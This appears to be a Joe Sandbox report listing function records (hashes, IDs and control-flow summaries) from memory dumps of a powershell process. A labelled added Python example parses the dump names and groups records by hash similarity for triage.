• Snapshot File: hcaresult_1_2_8800000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 73fc8bcabf8ea9b5d712bed68136f907932752430605dc057bdac06007879e29
• Instruction ID: 8b6c5d17f1d710117975d42ad7b6debcb95944fd348915b08eb8fa0ca2bdc3d1
• Opcode Fuzzy Hash: 73fc8bcabf8ea9b5d712bed68136f907932752430605dc057bdac06007879e29
• Instruction Fuzzy Hash: 721122B59003088FCB10DF9AC984B9EFBF8EB48324F24842AD458A7250D774A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 596 4f5e5b9-4f5e5c0 597 4f5e622-4f5e630 596->597 598 4f5e5c2-4f5e602 596->598 599 4f5e693-4f5e6b6 597->599 600 4f5e632-4f5e689 597->600 611 4f5e6bc-4f5e6d3 599->611 612 4f5e73a-4f5e753 599->612 600->599 618 4f5e6db-4f5e738 611->618 616 4f5e755 612->616 617 4f5e75e 612->617 616->617 619 4f5e75f 617->619 618->611 618->612 619->619
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
Similarity
• API ID:
• String ID: JJl
• API String ID: 0-415269788
• Opcode ID: 3eafe928bc4f8a6f1d6bd1624c6178b08f9aebbf7fa82191847ab4e624003a78
• Instruction ID: 3b703dc5ac4aeed68e31175662db287e12a5bf2b0cd4db44ac0975bed5e3be1a
• Opcode Fuzzy Hash: 3eafe928bc4f8a6f1d6bd1624c6178b08f9aebbf7fa82191847ab4e624003a78
• Instruction Fuzzy Hash: F9413B30A00209DFCB14EF69D694A9DBBF1FF49304F118569D41AAB3A4DB34AD46CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 627 4f56fe0-4f56fff 630 4f57105-4f57143 627->630 631 4f57005-4f57008 627->631 658 4f5700a call 4f57697 631->658 659 4f5700a call 4f5767c 631->659 632 4f57010-4f57022 634 4f57024 632->634 635 4f5702e-4f57043 632->635 634->635 641 4f570ce-4f570e7 635->641 642 4f57049-4f57059 635->642 647 4f570f2 641->647 648 4f570e9 641->648 643 4f57065-4f57073 call 4f5bf10 642->643 644 4f5705b 642->644 650 4f57079-4f5707d 643->650 644->643 647->630 648->647 651 4f570bd-4f570c8 650->651 652 4f5707f-4f5708f 650->652 651->641 651->642 653 4f57091-4f570a9 652->653 654 4f570ab-4f570b5 652->654 653->651 654->651 658->632 659->632
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: 4e2d3d36e1596aecb09033f446cacf6f58ac8a7333373e256a6b689c5a3001ea
• Instruction ID: 1277574948a3c45eb8051c9ebe32d6a1a1108f9e263c605f21332e3a21f729bc
• Opcode Fuzzy Hash: 4e2d3d36e1596aecb09033f446cacf6f58ac8a7333373e256a6b689c5a3001ea
• Instruction Fuzzy Hash: 09411D34B041058FDB14DF69C458AAEBBF2EF8D311F1540A9E946AB3A5DB35EC02CB60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 660 4f5e640-4f5e6b6 667 4f5e6bc-4f5e6d3 660->667 668 4f5e73a-4f5e753 660->668 673 4f5e6db-4f5e738 667->673 671 4f5e755 668->671 672 4f5e75e 668->672 671->672 674 4f5e75f 672->674 673->667 673->668 674->674
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
Similarity
• API ID:
• String ID: JJl
• API String ID: 0-415269788
• Opcode ID: 883569e97512899d0c9f6f6d378c27c34da45c13ea994c23117bb7cb03516505
• Instruction ID: 22787475fdf151e0c074d00f8f6df57ef7f63d1502c4a2bb25515a6c20fa3de5
• Opcode Fuzzy Hash: 883569e97512899d0c9f6f6d378c27c34da45c13ea994c23117bb7cb03516505
• Instruction Fuzzy Hash: 37311934A00615DFCB14DF79D594A9EBBF2FF58344F108528D41AA7394DB34AD46CB90
Uniqueness

Uniqueness Score: -1.00%

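                                                                                                      The records above all point at the same dump region, and the file name of that region carries the triage-relevant facts in its own fields (process index, base address, page protection, region type). The following parser is an added example written for this listing; it is not part of the Joe Sandbox report or of the Joe Sandbox product. It assumes the field order named in the docstring and decodes the protection and type values with the Win32 PAGE_* / MEM_* constants from winnt.h (two fields whose meaning the page does not document are kept raw). Because the page does not say which algorithm produces the Instruction Fuzzy Hash, the similarity measure is a plain per-nibble difference, which is only a crude proxy for the report's own similarity scoring. The three embedded records are copied from this listing.

```python
"""Decode Joe Sandbox per-function records (added example; not report or vendor code).

Assumed dump-name layout (labelled assumption):
  <process index>.<dump phase>.<dump id>.<base address>.<page protection>.
  <undocumented>.<region type>.<undocumented>.sdmp
"""
import re
from dataclasses import dataclass

# Win32 page-protection constants (winnt.h); the low byte selects exactly one of these.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values (winnt.h).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
FIELD_RE = re.compile(r"•\s*([^:]+):\s*(.*)")


@dataclass(frozen=True)
class DumpSource:
    process_index: int
    phase: int
    dump_id: str
    base: int
    protect: int
    field6: int      # meaning not documented on the page; kept raw
    mem_type: int
    field8: int      # meaning not documented on the page; kept raw

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)          # PAGE_EXECUTE* all live in the high nibble

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in (0x04, 0x08, 0x40, 0x80)

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


@dataclass(frozen=True)
class FunctionRecord:
    source: DumpSource
    pe_backed: bool
    snapshot: str
    opcode_id: str
    fuzzy_hash: str


def parse_dump_source(name: str) -> DumpSource:
    m = DUMP_NAME_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    g = m.groupdict()
    return DumpSource(int(g["proc"], 16), int(g["phase"], 16), g["dump_id"], int(g["base"], 16),
                      int(g["protect"], 16), int(g["f6"], 16), int(g["mtype"], 16), int(g["f8"], 16))


def parse_record(text: str) -> FunctionRecord:
    """Parse one bullet-list record exactly as it appears in the report listing."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.search(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    name, _, rest = fields["Source File"].partition(",")   # "<name>.sdmp, Offset: ..., based on PE: ..."
    pe = re.search(r"based on PE:\s*(true|false)", rest, re.I)
    return FunctionRecord(source=parse_dump_source(name),
                          pe_backed=bool(pe) and pe.group(1).lower() == "true",
                          snapshot=fields.get("Snapshot File", ""),
                          opcode_id=fields.get("Opcode ID", ""),
                          fuzzy_hash=fields.get("Instruction Fuzzy Hash", "").upper())


def nibble_distance(h1: str, h2: str) -> int:
    """Crude proxy: number of differing hex digits (assumption: hash algorithm undocumented)."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))


def cluster_by_hash(records, max_distance: int):
    """Greedy grouping: a record joins the first cluster holding a member within max_distance."""
    clusters = []
    for rec in records:
        for c in clusters:
            if any(nibble_distance(rec.fuzzy_hash, m.fuzzy_hash) <= max_distance for m in c):
                c.append(rec)
                break
        else:
            clusters.append([rec])
    return clusters


def triage(rec: FunctionRecord) -> str:
    """One-line summary of what a responder cares about for the region a function lives in."""
    s = rec.source
    flags = (["RWX"] if s.executable and s.writable else []) + ([] if rec.pe_backed else ["not PE-backed"])
    return f"proc#{s.process_index} {s.base:#010x} {s.protect_name} {s.mem_type_name} [{', '.join(flags) or 'nothing notable'}]"


# Three records copied from this listing (the first two differ in only a few hash nibbles).
SAMPLE_RECORDS = [
    "• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false\n"
    "• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd\n• API ID:\n• String ID:\n"
    "• Opcode ID: 21fc97d691039f2b284af3e0be9df6850315cb68555a1f924d9a16f030e6cde9\n"
    "• Instruction Fuzzy Hash: DC612871E00248DFCB14DFA9D58868DFBF1EF88310F15816AE919AB365EB34A846CB54\n",
    "• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false\n"
    "• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd\n"
    "• Opcode ID: 8e63b1d1eadaed22c45cd2a23b37fb2e5d4434fce0ae61087ea40cc3e2f55367\n"
    "• Instruction Fuzzy Hash: DE614971E00208DFDB14DFA9C58869DFBF1EF88310F15812AE919AB364EB34AC42CB54\n",
    "• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false\n"
    "• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd\n• String ID: JJl\n"
    "• Opcode ID: 883569e97512899d0c9f6f6d378c27c34da45c13ea994c23117bb7cb03516505\n"
    "• Instruction Fuzzy Hash: 37311934A00615DFCB14DF79D594A9EBBF2FF58344F108528D41AA7394DB34AD46CB90\n",
]

if __name__ == "__main__":
    recs = [parse_record(r) for r in SAMPLE_RECORDS]
    print(triage(recs[0]))
    for group in cluster_by_hash(recs, max_distance=12):
        print([r.opcode_id[:12] for r in group])
```

Reading the decoded line, the region is PAGE_EXECUTE_READWRITE, MEM_PRIVATE and not PE-backed inside the powershell snapshot. That combination is worth a look, but on its own it is not injection evidence: a .NET host such as powershell.exe keeps its JIT-compiled code in exactly this kind of writable, executable private heap, so the flags tell you where to carve, not what you will find. The near-identical fuzzy hashes between adjacent records are the more useful signal for de-duplicating functions before spending analyst time on them.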
                                                                                                      Control-flow Graph (legend: Executed / Not Executed; the rendered graph is not preserved in this copy)
                                                                                                      • Function at 4f5af98: 6 basic blocks spanning 4f5af98-4f5b07b, 6 edges; the entry block calls 4f5a984
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (&^q
                                                                                                      • API String ID: 0-2067289071
                                                                                                      • Opcode ID: a32da7e60a7199d626bd17966822649b1f1ff61bfe1fdfd04a208c8425b94a48
                                                                                                      • Instruction ID: 78775499214d0956ffe368a51f07a0228cea4078149ca696b13b6c4932d75961
                                                                                                      • Opcode Fuzzy Hash: a32da7e60a7199d626bd17966822649b1f1ff61bfe1fdfd04a208c8425b94a48
                                                                                                      • Instruction Fuzzy Hash: EF21A171E042588FCB14DFAED404A9EBBF5EB88320F14846AD518A7350CA75A805CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph (legend: Executed / Not Executed; the rendered graph is not preserved in this copy)
                                                                                                      • Function at 4f529f0: 40 basic blocks spanning 4f529f0-4f52c61, 60 edges; blocks 4f52af5 and 4f52c51 are the shared targets of most conditional branches
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 44b7c64984a049d236d512cffe823e01cef448c6b00ed3e9f4911007824540dc
                                                                                                      • Instruction ID: e8a173e47d0b941f4bc50cd079104da2c0bb3c319f49f8588e083b44063d8a53
                                                                                                      • Opcode Fuzzy Hash: 44b7c64984a049d236d512cffe823e01cef448c6b00ed3e9f4911007824540dc
                                                                                                      • Instruction Fuzzy Hash: D7919A74A002499FCB15CF58C4D89AEBBB1FF49310B258699D915AB3A5C735FC42CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f952265d9bba3c468b60c4a313671c77d98ea156445d9e3bd0323a62bc115814
                                                                                                      • Instruction ID: ffcfb996027241ed92bef1a2d9c17152a9f6b2c2384f4370ca0319f74fd88ddc
                                                                                                      • Opcode Fuzzy Hash: f952265d9bba3c468b60c4a313671c77d98ea156445d9e3bd0323a62bc115814
                                                                                                      • Instruction Fuzzy Hash: 7751C4317042059FD704EB79D844A2ABBEAEFC9215F2585A9DA05CB365EB31EC02C750
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21fc97d691039f2b284af3e0be9df6850315cb68555a1f924d9a16f030e6cde9
                                                                                                      • Instruction ID: 2bbbedfd0801c3cbe3d9856cf11454e5fe596e6c49cdfecf3369160ba1bd89cd
                                                                                                      • Opcode Fuzzy Hash: 21fc97d691039f2b284af3e0be9df6850315cb68555a1f924d9a16f030e6cde9
                                                                                                      • Instruction Fuzzy Hash: DC612871E00248DFCB14DFA9D58868DFBF1EF88310F15816AE919AB365EB34A846CB54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e63b1d1eadaed22c45cd2a23b37fb2e5d4434fce0ae61087ea40cc3e2f55367
                                                                                                      • Instruction ID: ac7c51a7ed0e4e08594d61e541e124097daf2ef1439e8415150d2af9f64f202c
                                                                                                      • Opcode Fuzzy Hash: 8e63b1d1eadaed22c45cd2a23b37fb2e5d4434fce0ae61087ea40cc3e2f55367
                                                                                                      • Instruction Fuzzy Hash: DE614971E00208DFDB14DFA9C58869DFBF1EF88310F15812AE919AB364EB34AC42CB54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fbc65bce07813e7e696abf2d929b3c330b13563ba5a46101ab4955e58eb68805
                                                                                                      • Instruction ID: 9d3ca587b4f74d66b93e3393c50d07676340c78ae2c5a071ca2ceccb4436bb1f
                                                                                                      • Opcode Fuzzy Hash: fbc65bce07813e7e696abf2d929b3c330b13563ba5a46101ab4955e58eb68805
                                                                                                      • Instruction Fuzzy Hash: FD512034B402058FCF14EF6CC59496ABBE6EF88314B158569E949CF365EB74ED018B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 810f36fbdf4119b0a24bfef7baa92f64f574cba4ce794db2545d4140a487f7d6
                                                                                                      • Instruction ID: 75b008c70ebd15f415337122468fceb0461fd294e100f95ed533def58b61344e
                                                                                                      • Opcode Fuzzy Hash: 810f36fbdf4119b0a24bfef7baa92f64f574cba4ce794db2545d4140a487f7d6
                                                                                                      • Instruction Fuzzy Hash: 1841A134B082818FDB06DB64C954AA97FF1AF8A304F1940D9D955EB3B2DB25EC03CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c340cb1c8a06692279fc246e90e14a140923ddc871c9ba964d824754ea5edcf4
                                                                                                      • Instruction ID: 2d69d1ca1455ccb6514464fa31c4739bbe6be633372b4b48ce44872fd6d8d053
                                                                                                      • Opcode Fuzzy Hash: c340cb1c8a06692279fc246e90e14a140923ddc871c9ba964d824754ea5edcf4
                                                                                                      • Instruction Fuzzy Hash: 9E413B74B402058FCB10DF6CC69492ABBE6EFC8314B158569E949DB365EB34ED028B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 89785593340efa73fc71cbdefe7a61d993dc8cca9f647f8d283f7d4b1cc2c847
                                                                                                      • Instruction ID: f8faf8ff7107c4d5e6ff5c9eed61d059b80b20690b2f2d1819ba6624e4b48efe
                                                                                                      • Opcode Fuzzy Hash: 89785593340efa73fc71cbdefe7a61d993dc8cca9f647f8d283f7d4b1cc2c847
                                                                                                      • Instruction Fuzzy Hash: 0341F3F1A20212CFCB259F28C501E6BBBA7AF85258F1885AED9009F2D2D735DD44C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3677b3687b67e4ec5be0eba79fd0fe5bb4d8c6625d0cf08dc3ec34c49307e8af
                                                                                                      • Instruction ID: 9b3c37d0c0dcbf8d265f72c2e4e3f69121d2b8ecf81f11a7da74373412b1ba12
                                                                                                      • Opcode Fuzzy Hash: 3677b3687b67e4ec5be0eba79fd0fe5bb4d8c6625d0cf08dc3ec34c49307e8af
                                                                                                      • Instruction Fuzzy Hash: 5631AE313002009FDB05EB78E844B9AB7A2EFC4215F018239D60ECB365DF70A84ACBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f5f50a3bbad5ce2a4d5d77de6594772f5567dfc06194c73f7f0be89e2273784
                                                                                                      • Instruction ID: 3801c64d1aeb29a34cb2f63380f4534d8024d9c24a4f7dc25bdff092f87ae794
                                                                                                      • Opcode Fuzzy Hash: 8f5f50a3bbad5ce2a4d5d77de6594772f5567dfc06194c73f7f0be89e2273784
                                                                                                      • Instruction Fuzzy Hash: B5316470E00209DFDB04DFA9C5947AE7BF6EF89310F158169E909EB364EB349C428B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 39694926363a11821bd55efb381da7ec0469aaef0b3736de2d623bc02f286791
                                                                                                      • Instruction ID: 720d9c50992aba97709afbe62b2895e3e7ddc30c5670446d201ae2a2a0f3a022
                                                                                                      • Opcode Fuzzy Hash: 39694926363a11821bd55efb381da7ec0469aaef0b3736de2d623bc02f286791
                                                                                                      • Instruction Fuzzy Hash: B4315070E00209DFDB04DFA9D5947AEBBF6EF89310F158169E905EB364EB349C428B61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d714f5f73cc210842f2ba511c3a30ceb45be5d82e9e8ad22f64ed287cc64bb90
                                                                                                      • Instruction ID: a484d49ea9b649e32a814efdc9bb74ea1456863827c5f89c4bf4b096371ae5eb
                                                                                                      • Opcode Fuzzy Hash: d714f5f73cc210842f2ba511c3a30ceb45be5d82e9e8ad22f64ed287cc64bb90
                                                                                                      • Instruction Fuzzy Hash: C631B7B4E002059FEB04DFB4D954ABEB7B2EF84304F1284A9CA15AF395DA35AD42CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d00db0fb1944412cfc4c480ada3aede7fa9e347d39c041f726b351cabf333a9
                                                                                                      • Instruction ID: 1beb544357122aef34f2abf75a23a323abd6e3d4766fcf40006e1ab45159febb
                                                                                                      • Opcode Fuzzy Hash: 4d00db0fb1944412cfc4c480ada3aede7fa9e347d39c041f726b351cabf333a9
                                                                                                      • Instruction Fuzzy Hash: 63316B70B002048FDB14EF68D458A9DBBF2EF98314F154569D806EB3A1DF30AC86CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0d5979f28b9b461bff9ce6a4a2a89d06babd58a66046b17680de5ee0215a05a
                                                                                                      • Instruction ID: 4115f84908da93b1bfd7712906572300b4fd5851b12ca5064304f3ff809e8130
                                                                                                      • Opcode Fuzzy Hash: b0d5979f28b9b461bff9ce6a4a2a89d06babd58a66046b17680de5ee0215a05a
                                                                                                      • Instruction Fuzzy Hash: 24316B71B002048FDB14DF69D458A9EBBF2EF98314F144529D906EB3A0DF35AC46CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3838db68a2e763760e8666c59b8d6320624c8bdf850b6f6382272a2a24ec484f
                                                                                                      • Instruction ID: c172223f79def0680a02ec0ef99913958eb425caec7c6b0b16ee8b798315164d
                                                                                                      • Opcode Fuzzy Hash: 3838db68a2e763760e8666c59b8d6320624c8bdf850b6f6382272a2a24ec484f
                                                                                                      • Instruction Fuzzy Hash: 563175B4E001099FEB04EFA4D554BBEB7B2EF84304F118469CA15AB394DA35AD428F90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c61bfd802bc96a61c7d36676d14a2ce2cee18934edfe8a2894234248cc85914
                                                                                                      • Instruction ID: d73659a21ccb62a261dba963f2ac368f24e2407a63b3a274687df5aeab635d7b
                                                                                                      • Opcode Fuzzy Hash: 1c61bfd802bc96a61c7d36676d14a2ce2cee18934edfe8a2894234248cc85914
                                                                                                      • Instruction Fuzzy Hash: C321F475604200EFCB05DF14E9C8B26BF75FB88314F24C5A9ED0A4A656C736E456CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d206ed47df0a4bae0edb04c0239c0b830734f4a1a091dabf42c601450fa013e4
                                                                                                      • Instruction ID: 816f61f702d5e717e5ed29707d160924d87457be5603c65e98ec4368b6c794b2
                                                                                                      • Opcode Fuzzy Hash: d206ed47df0a4bae0edb04c0239c0b830734f4a1a091dabf42c601450fa013e4
                                                                                                      • Instruction Fuzzy Hash: 7E219FB5A20206DFDB20CF59C54CB69B7E9BB45319F14806AD908DB390C774E984CBE1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
